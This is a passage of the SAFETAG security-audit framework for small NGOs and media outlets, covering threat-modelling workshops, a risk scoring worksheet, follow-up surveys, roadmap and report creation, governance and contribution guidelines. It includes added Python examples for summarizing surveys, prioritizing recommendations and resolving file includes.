After the brainstorming (or other exercises to generate or present a list of concerns), gather and cluster the stickies on a wall, revealing duplicate concerns across the groups and thematic areas of concern.

As clusters become clear, ask whether any events similar to this threat have already happened to the organization. What was the impact? Has it happened more than once? Regularly? Mark these threats.

Note: Some of these threats may be traumatic experiences, consider skipping public discussion of historical occurrence if many of the threats from the brainstorm (or from one person/group in particular) are particularly intense.

Threat Bow-tie

Select one of the threats that emerged as a concern from the clustering to place at the center of a "bow-tie" like drawing on a whiteboard or flip-chart paper.

Begin asking what other threats identified could come as a result of this threat, supplementing the responses from the participants with additional threats. For example, a hacked website could lead to loss of trust by funders or partners. "Chain reactions" can be illustrated as lines of events (loss of trust by funders could lead to a loss of funding). Do the same for what threats could lead to the "central" threat; a confiscation of a device could lead to email hacking, for example. Some threats can be both potential causes and secondary effects.

Close this out with a discussion of how every threat is potentially connected to both digital and physical impacts.

Threat Analysis Worksheet

The auditor should be able to modify and complete a worksheet like the below at the end of this process. Particularly advanced organizations may be able to fill this out as a survey.

Calculative Impact Identification

Threat type Impact Likelihood Risk
HUMAN THREATS
1. Accidental destruction, modification, disclosure of confidential information
2. Ignorance: inadequate security awareness, lack of security guidelines, lack of proper documentation, lack of knowledge
3. Workload: Too many or too few system administrators, highly pressured users
4. Users may inadvertently give information on security weaknesses to attackers
5. Incorrect system configuration
6. Inadequate security policy
7. Dishonesty: Fraud, theft, selling of confidential information
8. Attackers may use telephone to impersonate employees to persuade users/administrators to give user name/passwords, etc
GENERAL THREATS
1. Unauthorized use of “logged-in” computers
2. Installation of unauthorized software or hardware
3. Denial of service, due to Website traffic, large PING packets, etc.
4. Malware in programs, documents, e-mail attachments, etc
IDENTIFICATION AUTHORIZATION THREATS
1. Attack software masquerading as normal programs (Trojan horses)
2. Attack hardware masquerading as normal commercial hardware
3. External attackers masquerading as valid users
4. Internal attackers masquerading as valid users
PRIVACY THREATS
1. Telephone eavesdropping (via telephone bugs, inductive sensors, or service providers)
2. Electromagnetic eavesdropping
3. Rubbish eavesdropping (analyzing waste for confidential documents, etc.)
4. Planted bugs in the building
INTEGRITY/ACCURACY THREATS
1. Deliberate damage of information by external source
2. Deliberate damage of information by internal sources
3. Deliberate modification of information
ACCESS CONTROL THREATS
1. Password cracking (access to password files, use of default/weak passwords, etc)
2. External access to password files, and sniffing of the networks
3. Unsecured maintenance of online services, developer backdoors
4. Bugs in network software which can open unknown/unexpected security holes (holes can be exploited from externally to gain access)
5. Unauthorized physical access to system
LEGAL THREATS
1. Failure to comply with legal requirements
2. Liability for acts of internal users or attackers who abuse the system to perpetrate unlawful acts (ie, incitement to racism, gambling, money laundering, distribution of pornographic or violent material)
3. Liability for damages if an internal user attacks other sites
RELIABILITY OF SERVICE THREATS
1. Major natural disasters, fire, water, earthquake, floods, power outages, etc
2. Minor natural disasters, of short duration, or causing little damage
3. Equipment failure from defective hardware, cabling, or communications system.
4. Denial of Service due to network abuse: Misuse of routing protocols to confuse and mislead systems
5. Downloading of malicious applets, ActiveX controls, macros, PostScript files, etc. through the browsers
6. Sabotage: Physical destruction of network interface devices, cables

Risk = Impact * Likelihood

SCALE

Impact scale:

  1 = Impact is negligible
  2 = Effect is minor, major organization operations are not affected
  3 = Organization operations are unavailable for a certain amount of time, costs are incurred. Public/customer confidence is minimally affected
  4 = Significant loss of operations, significant impact on public/customer confidence
  5 = Effect is disastrous, systems are down for an extended period of time, rebuilding and replacement of systems is required
  6 = Effect is catastrophic, critical systems are completely down for an extended period; data is lost or irreparably corrupted; public and customers are totally affected

Likelihood scale:

  0 = Unlikely to occur
  1 = Likely to occur less than once per year
  2 = Likely to occur once per year
  3 = Likely to occur once per month
  4 = Likely to occur once per week
  5 = Likely to occur daily
Recommendation

Regional Context Research

Covered in full in Capacity Assessment:

Self Doxing

Covered in full in Risk Modeling:

Self-doxing:

This activity is aimed at showing the group how to research the data traces they leave online, as well as to improve the results of the Manual Reconnaissance activity with research carried out by individuals on themselves, which helps protect their privacy and makes results more detailed. With this approach, the auditor will only be informed about the results if mitigation steps such as takedowns are indicated.

Responsive Support

Summary

The auditor provides assistance for any immediate action needed (spot training, tool fixes, consulting on upcoming projects) -- this may also involve addressing vulnerabilities that triggered an incident response.

Purpose

In-audit activities and training are used to increase an organization's agency to seek out and address immediate security challenges within their organization, as well as enabling the organization to securely receive and store the audit report.

The Flow of Information

[Figure: Responsive Support Information Flow]

Guiding Questions

Approaches

Outputs

Operational Security

Preparation

Baseline Skills

Resources

Facilitation Preparation

Digital Security Trainings

Digital Security Guides

Training Resources

Activities

Due to the wide variety of needs found during SAFETAG audits, the framework relies on the wealth of existing training curricula and digital security guides, listed below.

Of specific use are the following training guides from Level-Up. Review the Level-Up Curricula Guide prior to using these activities:

Debrief

Summary

This component consists of an out-brief to key points of contact, providing basic pressure relief through group and individual interactions, and planning future follow-up with the host and key individuals.

Purpose

SAFETAG is an auditing framework designed to connect small civil society organizations and independent media outlets to the digital security services they need. But, more than that, it is designed to provide audits that increase an organization's agency to seek out and address security challenges independently. This can be an auditor's last in-person chance to engage with the staff to shape their perspective of the audit.

The debrief allows the auditor to ensure that they leave the host and its staff ready to start addressing their digital security. By providing some immediate outcomes to the host and its staff, and in combination with training or security consultation in the Responsive Support section, the auditor can ensure that the host sees the audit as a guide instead of a condemnation.

The Flow of Information

[Figure: Debrief Information Flow]

Guiding Questions

Approaches

Outputs

Operational Security

Preparation

Resources

Facilitation Preparation

Activities

Follow Up

Summary

This component allows an auditor to explain and get feedback on their report as well as evaluate the success of the process over time through a continued relationship with the host.

This component consists of the final meeting with the host and following up with them after a period of a few months to see if they need further assistance, are willing to share their experience working with any of the recommended resources, or as new resources are identified.

Purpose

Follow up can be a valuable tool for encouraging an organization to continue their digital security process. But, follow up needs to be desired by an organization and achievable for the auditor. As such, follow up must be minimally intrusive on both the auditor and the host's time.

The Flow of Information

[Figure: Information Flow]

Guiding Questions

Approaches

Outputs

Operational Security

Preparation

Baseline Skills

Resources

Resource Lists

Possible Financial Resources for Host Organizations

International organisations that may provide security grants

Frontline Defenders Security Grants Programme (see also the "Alternative Sources of Funding" list on this page)

Digital Defenders Digital Security Emergency and Support Grants

Freedom House Emergency Assistance Programs

Digital Security Trainings

Emergency Resources

Emergency Aid for Journalists

International protection mechanisms for human rights defenders

What Protection Can The United Nations Field Presences Provide?

24/7 Digital Security Helpline: [email protected] PGP key fingerprint: 6CE6 221C 98EC F399 A04C 41B8 C46B ED33 32E8 A2BC

Rapid Response Network: [email protected] PGP key: 7218 4AA7 4ED2 05ED 9863 A2A7 1F84 9150 6BFC 20AC

Organizations providing rapid-response digital security support and funding

Activities

Follow-up Meeting

Summary

Schedule and hold a follow-up call to discuss the audit report. This provides a valuable touch-point for the organization to read the report and ask the auditor any clarifying questions, as well as for the auditor to underscore any important steps for the organization.

Overview
Materials Needed
Considerations
Walkthrough

Each organization, and often even each key point of contact within the organization, will want to explore the report in different ways. Adapt to the needs of the organization, but make sure you cover the top-priority recommendations that the organization needs to consider in the immediate future.

Ask the organization to fill out Staff Feedback Surveys.

Ask if they need any specific resources or introductions not included in the report.

At the end of the call, schedule a second follow-up call to check in on their progress.

Recommendation

Making Introductions

Summary

Make introductions between the host and known resources as needed.

Overview
Materials Needed
Considerations
Walkthrough

Based on the specific recommendations in the audit report, as well as the auditor's understanding of the organization's capacity and barriers faced, introduce the relevant points of contact at the organization to resources such as digital security trainers, funding organizations which provide targeted support for digital security, technical experts to help on specific tasks (e.g. server hardening, website migration), as well as services that could help address their needs (e.g. secure hosting providers, rapid response support).

Follow up with both the organization and the resources introduced to check in on progress and revise which introductions you make going forward.

Recommendation

Long-Term Follow-up

Summary

Follow up with host after a few months to check on progress, get long-term feedback and connect with any new resources.

Overview
Materials Needed
Considerations
Walkthrough

This can be combined with the Staff Feedback Survey exercise, or to follow up on any concerns you have based on their responses to that survey. The main goal of the long-term follow-up is to ensure that the organization has ongoing connection points to any resources or connections they need to remove barriers to adoption.

Recommendation

Staff Feedback Survey

Summary

Providing a space for anonymous, guided feedback is valuable to gather information about how your audit work and the SAFETAG framework itself are supporting organizational understanding of risk and their ability to adapt. This long-term capacity building is critical to the SAFETAG framework, so finding ways to measure the impact of an audit towards these goals is important.

Overview
Materials Needed
Considerations
Walkthrough

This exercise provides a simple survey you can implement in a variety of settings (Google Forms, SurveyMonkey, via plain documents, etc.).

Sample Survey Questions

1. Before the audit:

| Statement | Completely False | False | I don't know | True | Completely True |
|---|---|---|---|---|---|
| I understood the risks my organization faces. | [ ] | [ ] | [ ] | [ ] | [ ] |
| I understood the risks that I personally face. | [ ] | [ ] | [ ] | [ ] | [ ] |
| I understood the risks that my organization's beneficiaries face. | [ ] | [ ] | [ ] | [ ] | [ ] |
| The auditor understood the risks my organization faces. | [ ] | [ ] | [ ] | [ ] | [ ] |
| The auditor understood the risks that I personally face. | [ ] | [ ] | [ ] | [ ] | [ ] |
| The auditor understood the risks that my organization's beneficiaries face. | [ ] | [ ] | [ ] | [ ] | [ ] |

2. After the audit:

| Statement | Completely False | False | I don't know | True | Completely True |
|---|---|---|---|---|---|
| I understood the risks my organization faces. | [ ] | [ ] | [ ] | [ ] | [ ] |
| I understood the risks that I personally face. | [ ] | [ ] | [ ] | [ ] | [ ] |
| I understood the risks that my organization's beneficiaries face. | [ ] | [ ] | [ ] | [ ] | [ ] |
| The auditor understood the risks my organization faces. | [ ] | [ ] | [ ] | [ ] | [ ] |
| The auditor understood the risks that I personally face. | [ ] | [ ] | [ ] | [ ] | [ ] |
| The auditor understood the risks that my organization's beneficiaries face. | [ ] | [ ] | [ ] | [ ] | [ ] |

3. Do you feel the audit took a reasonable amount of time?
4. Do you have any immediate behavioral changes you intend to make because of the audit?
5. Did the auditor provide you everything you need to start addressing your digital security?
6. Did any training that you received specifically address the risks identified during the audit?
7. Did the recommendations made by the auditor directly address the digital security needs you identified during the audit?
8. Did the recommendations made by the auditor address the digital security needs of your organization?
9. The recommendations from the audit...
10. The biggest barrier you see to implementing the auditor's recommendations is....
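To make the before/after statements above measurable, the following added example (not part of the SAFETAG text) aggregates anonymous responses to the Likert statements. It maps the five answer labels onto -2..+2, averages each statement per phase, and reports the shift. The CSV column names and the three respondents' answers are constructed for this example; a real export from Google Forms, SurveyMonkey or a plain document would need its columns mapped to these names first.

```python
"""Summarize before/after Likert responses from the Staff Feedback Survey.

Added example. The response data and column names below are constructed.
"""
import csv
import io
from collections import defaultdict

# The five answer columns of the survey, mapped onto a symmetric scale.
LIKERT = {
    "Completely False": -2,
    "False": -1,
    "I don't know": 0,
    "True": 1,
    "Completely True": 2,
}

# Constructed sample export: three anonymous respondents, two statements.
SAMPLE_CSV = """respondent,phase,statement,answer
r1,before,I understood the risks my organization faces.,False
r2,before,I understood the risks my organization faces.,I don't know
r3,before,I understood the risks my organization faces.,True
r1,after,I understood the risks my organization faces.,True
r2,after,I understood the risks my organization faces.,Completely True
r3,after,I understood the risks my organization faces.,True
r1,before,I understood the risks that I personally face.,Completely False
r2,before,I understood the risks that I personally face.,False
r3,before,I understood the risks that I personally face.,I don't know
r1,after,I understood the risks that I personally face.,True
r2,after,I understood the risks that I personally face.,True
r3,after,I understood the risks that I personally face.,I don't know
"""


def score(answer: str) -> int:
    """Convert one answer label to its scale value; unknown labels are an error
    rather than silently dropped, so a mis-exported column is noticed."""
    try:
        return LIKERT[answer.strip()]
    except KeyError:
        raise ValueError(f"not a Likert answer: {answer!r}") from None


def summarize(csv_text: str) -> dict:
    """Return, per statement: mean before, mean after, the shift, and how many
    respondents still answered 'I don't know' after the audit."""
    answers = defaultdict(lambda: {"before": [], "after": []})
    for row in csv.DictReader(io.StringIO(csv_text)):
        phase = row["phase"].strip().lower()
        if phase not in ("before", "after"):
            raise ValueError(f"phase must be before/after, got {phase!r}")
        answers[row["statement"]][phase].append(score(row["answer"]))

    summary = {}
    for statement, by_phase in answers.items():
        if not by_phase["before"] or not by_phase["after"]:
            raise ValueError(f"missing before or after answers for {statement!r}")
        before = sum(by_phase["before"]) / len(by_phase["before"])
        after = sum(by_phase["after"]) / len(by_phase["after"])
        summary[statement] = {
            "before": round(before, 2),
            "after": round(after, 2),
            "shift": round(after - before, 2),
            "unsure_after": by_phase["after"].count(0),
        }
    return summary


if __name__ == "__main__":
    for statement, s in summarize(SAMPLE_CSV).items():
        print(f"{s['shift']:+.2f}  {statement}  (before {s['before']}, after {s['after']}, "
              f"still unsure: {s['unsure_after']})")
```

The `unsure_after` count is reported separately because a mean alone hides respondents who still answer "I don't know" after the audit; those are the people a Long-Term Follow-up should reach.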
Recommendation

Reporting

Recommendation Development and Resource Identification

Summary

In this component the auditor identifies the organization's strengths and weaknesses (expertise, finance, willingness to learn, staff time, etc.) in adopting new digital and physical security practices, and documents the possible actions the organization could take to address the vulnerabilities found during the audit, the difficulty of taking on those actions, and the resources that the host may be able to leverage to address them. Resources can include, but are not limited to, local technical support and incident response groups/trade organizations, places to obtain discount software, trainers, and guides/resources they can use to support their up-skilling.

Purpose

The host needs to be able to take action after an audit. The recommendations that an auditor provides to address vulnerabilities must cover a range that allows an organization to address them in both the short-term and more comprehensively in the long-term. Knowing an organization's strengths and weaknesses will allow the auditor to provide more tailored recommendations that an organization will be more likely to attempt and achieve. In doing this the SAFETAG auditor has an opportunity to act as a trusted conduit between civil society organizations in need and organizations providing digital security training, technological support, legal assistance, and incident response.

Guiding Questions

Approaches

Outputs

Operational Security

Resources

Digital Security Guides

Digital Security Guides

Possible Financial Resources for Host Organizations

International organisations that may provide security grants

Frontline Defenders Security Grants Programme (see also the "Alternative Sources of Funding" list on this page)

Digital Defenders Digital Security Emergency and Support Grants

Freedom House Emergency Assistance Programs

Training Resources

Emergency Resources

Emergency Aid for Journalists

International protection mechanisms for human rights defenders

What Protection Can The United Nations Field Presences Provide?

24/7 Digital Security Helpline: [email protected] PGP key fingerprint: 6CE6 221C 98EC F399 A04C 41B8 C46B ED33 32E8 A2BC

Rapid Response Network: [email protected] PGP key: 7218 4AA7 4ED2 05ED 9863 A2A7 1F84 9150 6BFC 20AC

Organizations providing rapid-response digital security support and funding

Resource Lists

Recommendation Development

Resource Identification

Summary

In this component the auditor documents resources that the host may be able to leverage to address the technical, regulatory, organizational, or behavioral vulnerabilities identified during the audit.

This can include, but is not limited to, local technical support and incident response groups/trade organizations, places to obtain discount software, trainers, and guides/resources they can use to support their up-skilling.

Overview
Materials Needed
Considerations
Walkthrough
Recommendation

Roadmap Development

"Finding threats against arbitrary things is fun, but when you're building something with many moving parts, you need to know where to start, and how to approach it." - Threat Modeling: Designing for Security by Adam Shostack [90]

Summary

This component consists of an auditor sorting their recommendations in relation to the organization's threats and capacity. The auditor prioritizes vulnerabilities, weighs the implementation costs of recommendations, and then creates an actionable roadmap for the organization to make their own informed choices about possible next steps as they move forward.

Purpose

As part of SAFETAG's dedication to building agency and supporting organizational adoption of safer practices, a careful prioritization of vulnerabilities is invaluable in keeping audit results from appearing overwhelming. An organization needs to be able to weigh their possible paths forward against the time lost from program activities, the cost to implement a recommendation, and the other threats that they are not addressing. Roadmapping is used to give the host the tools to make these decisions and provide them with a recommended path forward that will allow them to make immediate gains towards protecting themselves. The existing in/formal security practices captured during this process will be used to remove organizational and psycho-social barriers to starting new practices.
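The prioritization described above, as an added example that is not part of the SAFETAG text or tooling: each recommendation carries the risk score of the vulnerability it addresses (the document's Impact * Likelihood, 0-30) and an effort estimate, and the planner sorts them into immediate, short-term and long-term phases so that high-risk, low-effort quick wins come first and prerequisites always precede the work that depends on them. The three-level effort scale, the phase cut-offs and the sample recommendations are assumptions constructed for this example.

```python
"""Roadmap development: order recommendations by risk addressed, effort required
and prerequisites.

Added example. Effort levels, phase thresholds and the sample recommendations
are constructed assumptions, not part of SAFETAG.
"""
from dataclasses import dataclass, field

EFFORT = {"low": 1, "medium": 2, "high": 3}        # assumed effort scale
PHASES = ["immediate", "short-term", "long-term"]


@dataclass
class Recommendation:
    name: str
    risk: int                      # Impact * Likelihood (0-30) of the vulnerability addressed
    effort: str                    # "low" | "medium" | "high"
    depends_on: list = field(default_factory=list)   # names that must be done first


def base_phase(rec: Recommendation) -> int:
    """Risk/effort matrix: high-risk quick wins first, costly low-risk work last.
    The risk >= 10 cut-off is an assumption for this example."""
    if rec.effort not in EFFORT:
        raise ValueError(f"effort must be one of {sorted(EFFORT)}, got {rec.effort!r}")
    effort = EFFORT[rec.effort]
    if rec.risk >= 10 and effort == 1:
        return 0
    if rec.risk >= 10 or effort == 1:
        return 1
    return 2


def build_roadmap(recs):
    """Return [(phase, name), ...] in the order the host should work through them."""
    by_name = {r.name: r for r in recs}
    for r in recs:
        for dep in r.depends_on:
            if dep not in by_name:
                raise KeyError(f"{r.name!r} depends on unknown item {dep!r}")

    # A recommendation can never sit in an earlier phase than its prerequisite.
    phase = {r.name: base_phase(r) for r in recs}
    changed = True
    while changed:
        changed = False
        for r in recs:
            for dep in r.depends_on:
                if phase[r.name] < phase[dep]:
                    phase[r.name] = phase[dep]
                    changed = True

    # Emit prerequisites first; among ready items prefer earlier phase, then
    # higher risk, then lower effort. Detects circular dependencies.
    done, ordered, remaining = set(), [], list(recs)
    while remaining:
        ready = [r for r in remaining if all(d in done for d in r.depends_on)]
        if not ready:
            raise ValueError("circular dependency among: "
                             + ", ".join(r.name for r in remaining))
        nxt = min(ready, key=lambda r: (phase[r.name], -r.risk, EFFORT[r.effort], r.name))
        ordered.append((PHASES[phase[nxt.name]], nxt.name))
        done.add(nxt.name)
        remaining.remove(nxt)
    return ordered


# Constructed sample recommendations with assumed risk scores and effort.
SAMPLE = [
    Recommendation("Enable automatic updates on staff laptops", 16, "low"),
    Recommendation("Adopt a password manager organization-wide", 15, "medium"),
    Recommendation("Inventory devices and data stores", 6, "low"),
    Recommendation("Migrate shared files to an encrypted, backed-up server", 12, "high",
                   ["Inventory devices and data stores"]),
    Recommendation("Write an incident response contact sheet", 4, "low"),
    Recommendation("Replace the ageing file server disk", 8, "medium"),
    Recommendation("Review physical access to the office", 3, "high"),
]

if __name__ == "__main__":
    for phase_name, name in build_roadmap(SAMPLE):
        print(f"{phase_name:10s} {name}")
```

Dependencies matter more than they look: an encrypted server migration scored as a quick win would be scheduled before the inventory it needs unless the planner pushes it back, which is exactly the kind of ordering mistake that makes a report feel overwhelming to the host.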

Baseline Skills

Preparation

Materials Needed

Approach

Outputs

Operational Security

Resources

Report Creation

"A good analysis might turn the threats into stories so they stay close to mind as software is being written or reviewed. A good story contains conflict, and conflict has sides. In this case, you are on one side, and an attacker is the other side." - Threat Modeling: Designing for Security [92]

Summary

This component consists of an auditor compiling their audit notes and recommendations into a comprehensive set of documents that show the current state of security, the process by which the auditor came to that assessment, and recommendations that will guide the host's progression to meet their security goals.

Purpose

Once an auditor has left, the report is the auditor's chance to continue a conversation (albeit a static one) -- even if the organization never talks to the auditor again. If written with care it can be a tool to encourage agency and guide adoption. The report has many audiences who will need to use it in different ways. For the auditor and the organization, it acts as documentation of what an auditor accomplished. For the organization, it will be a guide for connecting vulnerabilities to actual risks, a rallying cry for change, and proof of need for funders. For those the organization brings in to support their digital security, it provides a roadmap towards that implementation and a task list for future technologists and trainers paid to get the host there, as well as a checklist for validating that threats have been addressed.

Baseline Skills

Preparation

Materials Needed

Approach

Outputs

Operational Security

Resources

APPENDICES

APPENDIX: Code of Conduct and SAFETAG Governance

Mission Statement:

The mission of the SAFETAG community is to improve the security of civil society organizations around the world.

What we do: The community collaborates actively to share knowledge, build capacity, and create resources, while promoting transparency and accountability amongst its members, as well as with other communities of practice.

Community Standards

The SAFETAG Community of Practice (SCoP) will be a closed and private group, initially housed within the existing orgsec.community listserv.

SAFETAG Code of Conduct

Members of the SAFETAG community are expected to:

Community Manager

There will be, given that funds are available, a paid community manager who has at least a quarter of their time to support the SAFETAG community and contribute to and support the broader community around NGO organizational security. This community manager should rotate among organizations implementing substantial organizational security work. There may be gaps and/or overlaps due to project and staff funding requirements; it is important for implementing organizations to coordinate funding this position in order to minimize this.

The CM's role is to cultivate, support, and grow the community. This includes, but is not limited to:

The Advisory Board

Structure

Responsibilities

Contact

For SAFETAG content-related questions, please file an issue at https://github.com/SAFETAG/SAFETAG/issues. You can email the SAFETAG Advisory Board at AdvisoryBoard at safetag.org.

APPENDIX: How to contribute to SAFETAG

Contributing to SAFETAG

SAFETAG welcomes contributions!

SAFETAG is a community-managed product with an advisory board and community management roles laid out in our Code of Conduct. The Code of Conduct further outlines expectations of not only those using the content herein but also those contributing to it. By participating, you are expected to uphold this code.

When submitting new content, please write in clear, concise, and gender neutral language. This document will be updated with guidance on content translation once we have settled on a process for that. If you would like to submit content in a language other than English or Spanish, please open an issue to set that language up for submission.

Getting Started

Before you start work, it is critically important to review the current content and existing issues and create a new issue for your proposed work to solicit feedback -- this will save you a lot of time as the SAFETAG community can help refine your idea and advise on where best to include it in the framework (is it a new method? An activity or variant? Is there existing content in SAFETAG to update or improve?), as well as suggest additional resources worth considering, operational security and safety considerations.

You can also join the public slack to discuss changes and ask questions to the community.

Content Creation Guidelines

This section walks you through how SAFETAG is constructed, and what pieces of content are important to provide in a submission. Submissions which do not follow these guidelines will take significantly longer to be incorporated.

SAFETAG currently has three main compiled products: an overview guide, the full guide, and a curriculum to help train new auditors. This guide is primarily focused on the non-curricular SAFETAG content. The Curricula is an ADIDS-based approach to training on SAFETAG content (read more about the curricula content at https://github.com/SAFETAG/SAFETAG/wiki/Curricula-Document-Template).

The SAFETAG overview is the easiest place to start. The full guide is a comprehensive collection of not only the method-based objectives of the audit, but a variety of specific activities an auditor might choose to use and combine to achieve those. Both of these are built from the collection of Methods and Activities that make up SAFETAG.

Generally speaking, Methods are high-level, goal-focused aspects of the assessment. There are inevitable "fuzzy" borders between some methods. Creation of new methods should be minimized to not overly complicate the scope of SAFETAG.

Activities are the meat of an audit, and answer "how" and "where" type questions. To accomplish the goals of a method, one might conduct multiple activities to explore and verify organization practices from different angles - research, policy review, conversations / discussions, and technical verification, exploration, and scanning.

Within both Methods and Activities are smaller chunks of content which are used across the full range of SAFETAG "products." The tables below map out what content chunks exist across which products, and what they are. The Templates folder has sub-folders which provide the default files and indices for methods and activities.

SAFETAG is in the process of being rebuilt in a more interactive, meta-data driven interface at https://github.com/contentascode/safetag. The current structure will be migrated into this format, and updates to the process will be posted here.

Creating a new SAFETAG Method

New methods must be linked into the master index file, and must have activities linked to them. To link the new method into the master index file (and therefore have the method "included" in the "master" SAFETAG build), these index files must be linked into the relevant master index file in the language folder (en/index.guide.md and en/index.overview.md). See below for how Activities are linked into the methods.

Method Content notes:

Method Section and Stylistic notes:

| Section | ADIDS | Guide | Overview | Definition |
|---|---|---|---|---|
| Quote | - | - | - | OPTIONAL: No longer included in the compiled guides, but an introductory / framing quote for the section |
| Summary | - | + | + | A short (two to three sentence) basic overview of the methodology -- What is the auditor doing, what are the high-level outputs and processes? |
| Purpose | + | + | + | The justification for why this methodology is used -- Why is this collection of activities being pursued? What is the end goal? |
| Information Flow | - | + | + | The "Flow of Information" shows the types of information that an audit activity builds upon (input), and the types of information that an audit activity may reveal (outcomes). As this information is acquired, earlier audit activities will have to be re-visited based upon it -- What are the inputs which feed into this, and what outputs are possible/expected? Modify the Information Flow diagram in images/info_flows |
| Guiding Questions | + | + | + | Each audit activity is guided by a small set of core questions. Key questions are included to help an auditor identify when they have acquired enough information and customize their approach while still collecting the correct types of information to support the organization -- What are specific guiding or research questions to be answered by conducting activities in pursuit of the larger goal? |
| Approaches | - | + | + | Many of these audit activities can be completed in multiple ways depending upon auditor skill and the organizational technical setup and capacity. The approach section includes a descriptive, bulleted list of activities that can be used to carry out parts, or the whole, of the information collection for an audit activity -- What are the high-level approaches to answering the guiding questions? Try to list different types of approaches: some might be technical, some research, some interactive |
| Outputs | - | + | - | The data or impact that is expected from this method -- What are specific outputs to aim for? These should further clarify the information flow diagram above. |
| Operational Security | - | + | + | OPTIONAL: Operational Security considerations -- Does pursuing this objective have any broad operational security challenges to be aware of that are not otherwise captured in the per-activity detail? |
| Preparation | - | + | - | OPTIONAL: Any preparation, skills, or materials needed for the method as a whole. Individual exercises will specify this more exactly -- What must an auditor do to prepare for this work that is not otherwise captured in the per-activity detail? |
| Resources | - | + | - | Resources should include not only the research used in the creation of the method, but also recommended reading, references, and additional options for conducting this work -- What references did you use in creating this method? Are there references which provide activity-style walkthroughs or additional background? Are there existing collections of references (in the references folder) that an auditor should review when looking at this methodology? |
| Activities | - | + | - | Specific activities to conduct in pursuit of this objective. See "Creating a New SAFETAG Activity" -- What existing activities are useful to achieve the goal and specific output(s) listed? Do they represent? If creating a new method, often new activities will be needed to ensure the suggested approaches are "filled in". Please note that Activities are separate documents linked into the Methods |

Creating a new SAFETAG Activity

New activities must be linked to a method. To link an activity to a method, please update both the activities.md file in the method folder, and also add it directly to index.guide.md under the method. The current build process uses the index.guide.md link, but for content tracking, it's best to update both. If adding an activity to multiple methods, select a primary method where it is the most relevant to that method's outputs, and for additional methods, link it in following this format:

 <div class="boxtext">
 #### Activity Title
 Covered in full in Primary Method:
 !INCLUDE "exercises/activity_title/approach.md"
 </div>

Activity Content notes:

Note: For activities where multiple different approaches could fulfill the exact same goals, consider building activity variants (see below).

Activity Content and Stylistic notes:

| Section | ADIDS | Guide | Overview | Definition |
|---|---|---|---|---|
| Summary | - | + | - | A concise description of the exercise. This describes the vulnerability or class of vulnerabilities (e.g. "PHP is out of date") and its overall impact -- What does this specific activity accomplish? |
| Overview | - | + | - | A short, bulleted list that clarifies the general steps, especially for cases where the walkthrough is very complex or involves multiple or parallel processes. Also included when only referencing an exercise from a method, instead of including the full exercise. |
| Materials Needed | - | + | - | Optional; does this require specific software, hardware, or preparation? |
| Considerations | - | + | - | Optional; notes on safely carrying out the activity and protecting the data collected, as well as other challenges (psycho-social, legal, ethical) to be aware of -- Are there operational security concerns, or important baseline skills to master before undertaking this activity? |
| Walkthrough | - | + | - | A multi-use guide with concise instructions for a skilled technologist to replicate or prove the vulnerability. This is used in the SAFETAG curricula, by auditors needing to recall that random flag for that one command without going online, and for the organization's technical staff to verify that this vulnerability has been addressed. This should provide concise guidance at a peer level for the general steps an auditor should take, but should point to, not re-create, existing documentation. For technical aspects, ideal walkthroughs should enable IT staff/contractors to follow along and verify fixes. For research activities, research methods and preferred resources should be provided, and for facilitative exercises, a clear explanation of the process and any tips or challenges should be given. |
| Variants | - | + | - | Parallel approaches which can be used for the same effect but might work better in different contexts. See below for when and how to use these |
| Recommendations | - | + | - | Optional; sample text of common recommendations for how to address vulnerabilities identified through this activity (e.g. "Work with the webmaster to update PHP and/or migrate to a hosting system which manages this automatically...") -- for activities which have common findings, provide stock language to assist in report creation |

Activity variants

In some cases, one activity will have many parallel ways to achieve the goal; this is often the case with technical activities where there is a collection of similar tools all focused on the same overall outcome. In cases like these, it is best to create Activity Variants instead of new activities. This lets different auditors select and use tools and approaches they are most comfortable with, while still operating within the larger SAFETAG framework.

To use variants, you will create files in the activity's folder that begin with variant_, and link them in from the instructions.md file. The variant_ files should not use any header formatting.

In your instructions.md file, begin by introducing any common, cross-variant instructions or guidance not covered in other activity sections, and summarize each variant. At the end of the instructions text, add the following for each variant, updating the title and file name to the specific variant:

 ___

 ###### VARIANT TITLE

 !INCLUDE "variant_descriptive_file_name.md"
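The `!INCLUDE` snippets above (the boxtext block that pulls an activity's approach into a secondary method, and the variant include at the end of instructions.md) are resolved by the SAFETAG build. The script below is an added example, not the project's own build tooling: it expands `!INCLUDE "path"` directives over an in-memory set of files, refuses include cycles, and lints `variant_` files for the header formatting the text above says they must not use. It assumes include paths are relative to the repository root, and the folder names and file contents in `FILES` are constructed for this example (only `en/index.guide.md`, `activities.md`, `instructions.md`, `approach.md` and the `variant_` prefix come from the text).

```python
"""Resolve SAFETAG-style !INCLUDE directives and lint variant_ files.

Added example. The include-path convention (relative to the repository root)
and the sample files below are assumptions constructed for this example.
"""
import re

INCLUDE_RE = re.compile(r'^\s*!INCLUDE\s+"([^"]+)"\s*$')
HEADING_RE = re.compile(r'^\s{0,3}#{1,6}\s')      # ATX markdown heading


def resolve_includes(path: str, files: dict, _stack: tuple = ()) -> str:
    """Return the text of `path` with every !INCLUDE line replaced by the
    (recursively resolved) content of the named file."""
    if path in _stack:
        raise ValueError("include cycle: " + " -> ".join(_stack + (path,)))
    if path not in files:
        raise FileNotFoundError(f"included file not found: {path}")
    out = []
    for line in files[path].splitlines():
        match = INCLUDE_RE.match(line)
        if match:
            included = resolve_includes(match.group(1), files, _stack + (path,))
            out.extend(included.splitlines())
        else:
            out.append(line)
    return "\n".join(out)


def lint_variants(files: dict) -> list:
    """Variant files are included under a heading supplied by instructions.md,
    so any heading inside them breaks the document outline. Report each one."""
    problems = []
    for path, text in files.items():
        if path.rsplit("/", 1)[-1].startswith("variant_"):
            for lineno, line in enumerate(text.splitlines(), 1):
                if HEADING_RE.match(line):
                    problems.append(f"{path}:{lineno}: heading in variant file: {line.strip()}")
    return problems


# Constructed miniature of the repository layout; contents are illustrative only.
FILES = {
    "en/index.guide.md":
        '# Guide\n'
        '!INCLUDE "methods/example_method/activities.md"\n',
    "methods/example_method/activities.md":
        '<div class="boxtext">\n'
        '#### Example Activity\n'
        'Covered in full in Primary Method:\n'
        '!INCLUDE "exercises/example_activity/approach.md"\n'
        '</div>\n',
    "exercises/example_activity/approach.md":
        "Review the organization's published contact details with staff.\n",
    "exercises/example_activity/instructions.md":
        'Common guidance for every variant.\n'
        '___\n\n'
        '###### TOOL A\n\n'
        '!INCLUDE "exercises/example_activity/variant_tool_a.md"\n',
    "exercises/example_activity/variant_tool_a.md":
        '## Tool A\n'                      # a heading: exactly what the lint should flag
        'Steps for this variant go here.\n',
}

if __name__ == "__main__":
    print(resolve_includes("en/index.guide.md", FILES))
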